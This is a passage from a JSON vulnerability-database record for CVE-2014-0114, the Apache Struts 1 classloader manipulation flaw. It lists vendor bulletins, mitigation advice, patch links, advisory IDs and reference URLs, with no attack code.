(CVE-2015-5652):\n\n *\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553997\u003e\n\n * Spring Framework: KM02553998 (CVE-2013-6429):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553998\u003e\n\nHISTORY\nVersion:1 (rev.1) - 4 November 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nThanks to the efforts of Alvaro Munoz and the HP Fortify team, the\nApache Struts project team can recommend a first mitigation that is\nrelatively simple to apply. It involves the introduction of a generic\nServlet filter, adding the possibility to blacklist unacceptable request\nparameters based on regular expressions. Please see the corresponding HP\nFortify blog entry [2] for detailed instructions. Based\non this information, the Apache Struts project team recommends to apply\nthe mitigation advice *immediately* for all Struts 1 based applications. \n\nStruts 1 has had its End-Of-Life announcement more than one year ago\n[3]. However, in a cross project effort the Struts team is looking for a\ncorrection or an improved mitigation path. Please stay tuned for further\ninformation regarding a solution. \n\nThis is a cross-list posting. If you have questions regarding this\nreport, please direct them to security@struts.apache.org only. \n\n[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html\n[2]\nhttp://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro\n[3] http://struts.apache.org/struts1eol-announcement.html\n\n-- \nRen\\xe9 Gielen\nhttp://twitter.com/rgielen\n", "sources": [ { "db": "NVD", "id": "CVE-2014-0114" }, { "db": "BID", "id": "67121" }, { "db": "VULMON", "id": "CVE-2014-0114" }, { "db": "PACKETSTORM", "id": "149311" }, { "db": "PACKETSTORM", "id": "126619" }, { "db": "PACKETSTORM", "id": "126692" }, { "db": "PACKETSTORM", "id": "149050" }, { "db": "PACKETSTORM", "id": "127868" }, { "db": "PACKETSTORM", "id": "137980" }, { "db": "PACKETSTORM", "id": "154792" }, { "db": "PACKETSTORM", "id": "128873" }, { "db": "PACKETSTORM", "id": "139721" }, { "db": "PACKETSTORM", "id": "126455" } ], "trust": 2.16 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41690", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0114" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0114", "trust": 3.0 }, { "db": "BID", "id": "67121", "trust": 1.9 }, { "db": "SECUNIA", "id": "59118", "trust": 1.6 }, { "db": "SECUNIA", "id": "59480", "trust": 1.6 }, { "db": "SECUNIA", "id": "59246", "trust": 1.6 }, { "db": "SECUNIA", "id": "60177", "trust": 1.6 }, { "db": "SECUNIA", "id": "59479", "trust": 1.6 }, { "db": "SECUNIA", "id": "58710", "trust": 1.6 }, { "db": "SECUNIA", "id": "59718", "trust": 1.6 }, { "db": "SECUNIA", "id": "59430", "trust": 1.6 }, { "db": "SECUNIA", "id": "59464", "trust": 1.6 }, { "db": "SECUNIA", "id": "58851", "trust": 1.6 }, { "db": "SECUNIA", "id": "59228", "trust": 1.6 }, { "db": "SECUNIA", "id": "59704", "trust": 1.6 }, { "db": "SECUNIA", "id": "59014", "trust": 1.6 }, { "db": "SECUNIA", "id": "57477", "trust": 1.6 }, { "db": "SECUNIA", "id": "59245", "trust": 1.6 }, { "db": "SECUNIA", "id": "58947", "trust": 1.6 }, { "db": "SECUNIA", "id": "60703", "trust": 1.6 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2014/07/08/1", "trust": 1.6 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2014/06/15/10", "trust": 1.6 }, { "db": "HITACHI", "id": "HS14-018", "trust": 0.9 }, { "db": "HITACHI", "id": "HS14-020", "trust": 0.9 }, { "db": "JUNIPER", "id": "JSA10643", "trust": 0.9 }, { "db": "JVN", "id": "JVN30962312", "trust": 0.9 }, { "db": "CS-HELP", "id": "SB2022072128", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.1427", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.1089", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.3134", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2355", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0544", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2568", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.2293.2", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSMA-20-184-01", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201404-581", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2014-0114", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "149311", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126619", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126692", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "149050", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127868", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137980", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "154792", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128873", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139721", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126455", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0114" }, { "db": "BID", "id": "67121" }, { "db": "PACKETSTORM", "id": "149311" }, { "db": "PACKETSTORM", "id": "126619" }, { "db": "PACKETSTORM", "id": "126692" }, { "db": "PACKETSTORM", "id": "149050" }, { "db": "PACKETSTORM", "id": "127868" }, { "db": "PACKETSTORM", "id": "137980" }, { "db": "PACKETSTORM", "id": "154792" }, { "db": "PACKETSTORM", "id": "128873" }, { "db": "PACKETSTORM", "id": "139721" }, { "db": "PACKETSTORM", "id": "126455" }, { "db": "CNNVD", "id": "CNNVD-201404-581" }, { "db": "NVD", "id": "CVE-2014-0114" } ] }, "id": "VAR-201404-0288", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4253262875 }, "last_update_date": "2024-11-29T21:26:04.405000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "struts-1.2.9-4jpp.8.el5_10.src", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=49743" }, { "title": "Red Hat: Important: Red Hat A-MQ Broker 7.5 release and security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192995 - Security Advisory" }, { "title": "Debian CVElist Bug Report Logs: libstruts1.2-java: CVE-2014-0114", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=96f4091aa31a0ece729fdcb110066df5" }, { "title": "Red Hat: CVE-2014-0114", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2014-0114" }, { "title": "Red Hat: Important: Fuse 7.1 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182669 - Security Advisory" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f5bb2b180c7c77e5a02747a1f31830d9" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=81c63752a6f26433af2128b2e8c02385" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=55ea315dfb69fce8383762ac64250315" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "IBM: Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=68c6989b84f14aaac220c13b754c7702" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099" }, { "title": "struts1-patch", "trust": 0.1, "url": "https://github.com/ricedu/struts1-patch " }, { "title": "", "trust": 0.1, "url": "https://github.com/weblegacy/struts1 " }, { "title": "struts1filter", "trust": 0.1, "url": "https://github.com/rgielen/struts1filter " }, { "title": "StrutsExample", "trust": 0.1, "url": "https://github.com/vikasvns2000/StrutsExample " }, { "title": "struts-mini", "trust": 0.1, "url": "https://github.com/bingcai/struts-mini " }, { "title": "strutt-cve-2014-0114", "trust": 0.1, "url": "https://github.com/anob3it/strutt-cve-2014-0114 " }, { "title": "super-pom", "trust": 0.1, "url": "https://github.com/ian4hu/super-pom " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0114" }, { "db": "CNNVD", "id": "CNNVD-201404-581" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0114" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "http://www.securityfocus.com/bid/67121" }, { "trust": 2.5, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html" }, { "trust": 2.2, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html" }, { "trust": 2.2, "url": "http://www.debian.org/security/2014/dsa-2940" }, { "trust": 2.2, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675496" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042296" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.9, "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "trust": 1.9, "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675266" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676110" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677110" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675689" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674812" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674128" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675972" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2018:2669" }, { "trust": 1.7, "url": "http://advisories.mageia.org/mgasa-2014-0219.html" }, { "trust": 1.7, "url": "https://security.gentoo.org/glsa/201607-09" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2019:2995" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3cannounce.apache.org%3e" }, { "trust": 1.6, "url": "http://openwall.com/lists/oss-security/2014/06/15/10" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3ccommits.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://issues.apache.org/jira/browse/beanutils-463" }, { "trust": 1.6, "url": "http://secunia.com/advisories/57477" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675898" }, { "trust": 1.6, "url": "http://openwall.com/lists/oss-security/2014/07/08/1" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3cdev.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://security.netapp.com/advisory/ntap-20140911-0001/" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3ccommits.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59430" }, { "trust": 1.6, "url": "http://seclists.org/fulldisclosure/2014/dec/23" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58851" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3cnotifications.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59704" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3cissues.activemq.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3cgitbox.activemq.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3cissues.activemq.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3cissues.activemq.apache.org%3e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59480" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3cuser.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59246" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59245" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59479" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59118" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://apache-ignite-developers.2346864.n4.nabble.com/cve-2014-0114-apache-ignite-is-vulnerable-to-existing-cve-2014-0114-td31205.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58947" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3cdev.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3ccommits.dolphinscheduler.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136958.html" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59014" }, { "trust": 1.6, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665" }, { "trust": 1.6, "url": "http://secunia.com/advisories/58710" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3ccommits.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675387" }, { "trust": 1.6, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "trust": 1.6, "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "trust": 1.6, "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e" }, { "trust": 1.6, "url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/release-notes.txt" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59464" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3cdev.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59228" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3cdevnull.infra.apache.org%3e" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931" }, { "trust": 1.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60177" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:095" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3cdev.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3csolr-user.lucene.apache.org%3e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60703" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3cnotifications.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59718" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3ccommits.pulsar.apache.org%3e" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2" }, { "trust": 1.6, "url": "https://security.netapp.com/advisory/ntap-20180629-0006/" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3csolr-user.lucene.apache.org%3e" }, { "trust": 1.6, "url": "https://access.redhat.com/solutions/869353" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3cissues.commons.apache.org%3e" }, { "trust": 1.6, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" }, { "trust": 1.6, "url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3cissues.commons.apache.org%3e" }, { "trust": 1.2, "url": "https://rhn.redhat.com/errata/rhsa-2014-0497.html" }, { "trust": 1.0, "url": "https://rhn.redhat.com/errata/rhsa-2014-0498.html" }, { "trust": 1.0, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755" }, { "trust": 1.0, "url": "http://struts.apache.org/release/2.3.x/docs/s2-021.html" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0114" }, { "trust": 0.9, "url": "http://www.liferay.com/community/security-team/known-vulnerabilities/-/asset_publisher/t8ei/content/cst-sa-lps-46552-struts-1-classloader-manipulation" }, { "trust": 0.9, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10643\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674435" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674428" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674937" }, { "trust": 0.9, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04311273" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675822" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673663" }, { "trust": 0.9, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-018/index.html" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21672316" }, { "trust": 0.9, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676375" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673098" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673944" }, { "trust": 0.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673101" }, { "trust": 0.9, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04399728" }, { "trust": 0.9, "url": 